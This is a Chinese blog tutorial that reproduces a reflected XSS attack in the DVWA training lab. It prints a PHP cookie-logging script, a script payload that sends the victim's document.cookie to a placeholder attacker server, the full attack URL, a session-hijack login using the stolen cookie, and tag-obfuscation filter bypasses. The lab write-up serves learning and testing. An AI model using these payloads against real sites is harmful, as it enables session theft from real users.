XSS漏洞复现

最新推荐文章于 2024-09-13 22:14:06 发布
最新推荐文章于 2024-09-13 22:14:06 发布
阅读量2.8k 收藏 8
点赞数 1
分类专栏: Web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iczfy585/article/details/105129802
版权

XSS漏洞复现

实验环境DVWA

XSS(cross site script) 跨站脚本。属于代码执行的一种,这里执行的是前端代码,一般是javascript代码。对于反射型的XSS,攻击代码是在Http的响应包中。攻击者通过构造含有攻击代码的URL,被攻击者点击后,攻击代码在客户端解释执行。可以通过此恶意代码向攻击者的服务器发送被攻击者的敏感信息,从而实现攻击目的。

下面测试一下,攻击者盗用cookie的实例。

  1. 登录DVWA,将安全等级改为low,选择反射型XSS测试。

在这里插入图片描述

输入123发现会在下方回显输入的内容。

  1. 尝试输入<xss>后发现页面没有回显内容,打开开发者选项查看一下源代码

在这里插入图片描述

发现输入的内容被当做了html的标签来对待了。

  1. 尝试输入一下代码<script>document.location='http://www.baidu.com'</script>发现这段代码被执行了。跳转到了百度的界面。可以判定存在客户端代码执行。
  2. 这里在虚拟机上开启一个web服务,写一个cook.php代码。
<?php
    //用来获得用户的cookie信息
    $cookie = $_GET['cookie'];
	file_put_contents('cookie.txt',$cookie);
 ?>

  1. 构造攻击url : <script>document.loaction='http://攻击者服务器ip地址/cookie.php?cookie='+document.cookie</script>

  2. 模拟被攻击者去访问一下:localhost:8081/dvwa/vulnerabilities/xss_r/?name=<script>document.loaction='http://攻击者服务器ip地址/cookie.php?cookie='+document.cookie</script>

    注意:name参数需要进行url编码,因为其中含有特殊字符,无法直接传递到后端。这里用hackbar进行编码。

在这里插入图片描述

  1. 查看攻击端的服务器,发现已经得到了用户的cookie

在这里插入图片描述
8. 尝试用用户的cookie登录一下:(修改PHPSESSID和security)

在这里插入图片描述

  1. 直接访问index.php,发现登录成功了。

在这里插入图片描述

Medium等级

经过测试Medium等级是存在双写绕过和大小写绕过script标签的。

输入:

<ScrIPt>alert(xss)</srcipt>
<scr<script>ipt>alert(xss)</script>

都可以实现绕过

iringzh
关注
专栏目录
XSS漏洞复现(CVE-2017-12794)
m0_56578216的博客
08-30 478
前提条件:1.
DVWA XSS漏洞复现
ch258563的博客
04-02 348
DVWA XSS漏洞复现
XSS漏洞总结和漏洞复现
weixin_45492087的博客
07-28 2427
跨站脚本攻击XSS(CrossSiteScripting),为区别层叠样式表(CascadingStyleSheets,CSS),所以改写为XSS
XSS漏洞复现
qq_39744805的博客
09-01 1314
跨站脚本( Cross-site Scripting )攻击,攻击者通过网站输入框输入payload(脚本代码 ),当用户访问网页时,恶意payload自动加载并执行,以达到攻击者目的( 窃取cookie、恶意传播、钓鱼欺骗等)为了避免与HTML语言中的CSS相混淆,通常称它为“XSS”。
2024全网最全面及最新且最为详细的网络安全技巧 七之 XSS漏洞典例分析POC以及 如何防御和修复[含JAVASCRIPT和HTML代码层面分析,代码都进行了详细的注释](3)
最新发布
heike_Ch的博客
09-13 586
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
复现XSS漏洞及分析
qq_61739597的博客
09-01 3172
跨站脚本攻击XSS(Cross Site Scripting),为区别层叠样式表(Cascading Style Sheets, CSS),所以改写为XSS
pikachu之xss漏洞复现
m0_54024658的博客
05-24 748
xss跨站脚本xss简介xss漏洞类型反射型存储型DOM型XSS攻击过程漏洞复现反射型XSS(get)存储型XSSDOM型XSS xss简介 XSS(跨站脚本)是一种发生在Web前端的漏洞,所以其危害的对象也主要是前端用户,XSS漏洞可以用来进行钓鱼攻击、前端js挖矿、盗取用户cookie,甚至对主机进行远程控制。因为对程序中输入和输出的控制不够严格,导致漏洞的形成。 xss漏洞类型 反射型 交互的数据一般不会被存在数据库里面,一次性,所见即所得,一般出现在查询页面等 存储型 交互的数据会被存在数据库里面,
漏洞复现--xss
weixin_52351575的博客
01-11 872
切换至Attack机,即我们的攻击机,然后来到火狐浏览器,即攻击方,当受害者用户点击“XSS(Stored)”之后,XSS平台会有一条消息,刷新,查看“接受面板”,发现多了一个数据,这就是我们受害者用户的一个数据,在这里面我们可以看到受害者的cookie,如下图。选择公共模板,在“default.js”下,修改模板,将“http://网站地址”修改为“http://10.1.1.200/xss/index.php”,修改完成之后点击“修改”,如下图。
XSS漏洞复现(包括xssgame和三个高级xss漏洞
qq_63890458的博客
08-17 1012
复现xss游戏里的8个简单模式,并且写有大概解题思路过程及原理。此外,还复现了两个DOM破坏的高级xss漏洞,利用的技巧很多,前端这种弱编程的变化太多了,原理性太不规律,需要很深的底层代码理解,才能找到漏洞,大家加油吧。
xss漏洞复现
h2896713787的博客
11-10 5549
xss
XMind漏洞xss复现(最全payload图文教程)
weixin_51387754的博客
05-18 425
https://mp.weixin.qq.com/s/gunmk1ox62sg2ifmVLFy7A
Heybbs-2.0存储型XSS漏洞复现
1匹黑马
01-27 765
文章目录前言代码审计漏洞验证临时修复 前言 这个漏洞的成因主要是因为程序对用户的输入没有进行过滤而导致的 代码审计 漏洞出现在注册页面上,这里因为没有进行过滤,所以我们可以直接注册一个XSS语句,且每次访问index.php页面都会执行这个语句。 先来看一下/php/register.php的代码吧 可以看到,POST过来的username直接就赋值给了$username,下面的sql语句也是直接拼接进去的,连个单引号都没加 这个bbs系统怎么说呢,但凡有数据交互的地方,就有利用点… 漏洞验证 首先注
XSS复现
nixiaoge的博客
08-18 1035
XSS是一种网络安全漏洞,允许攻击者通过注入恶意脚本到网页中,影响用户。主要类型包括反射型XSS、DOM型XSS和CSS型XSS。防范措施包括输入验证、转义用户输入和使用HttpOnlyCookie。文章详细解释了各种XSS攻击的原理和防范方法。
存储型XSS_简单漏洞复现
CHUNJIUJUN的博客
08-10 443
首先随便注册一个账号登录 写一篇邮件,邮件内容插入xss语句 burpsuit抓包,发送到repeater,放包,发现script被过滤了 所以改包改用<img src=1 onpointerout=alert(123)> 这里我们去看看我们发布的内容是否双击以后有弹窗 弹窗出现,说明有xss漏洞 ...
vulhub xss攻击复现
05-01
例如,在DOM-XSS漏洞复现环境中,我们需要使用浏览器的开发者工具查看网页源代码,并找到相关的input字段,然后输入恶意脚本,提交表单即可触发XSS攻击。 需要注意的是,在进行XSS漏洞复现时,我们需要对攻击的范围...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值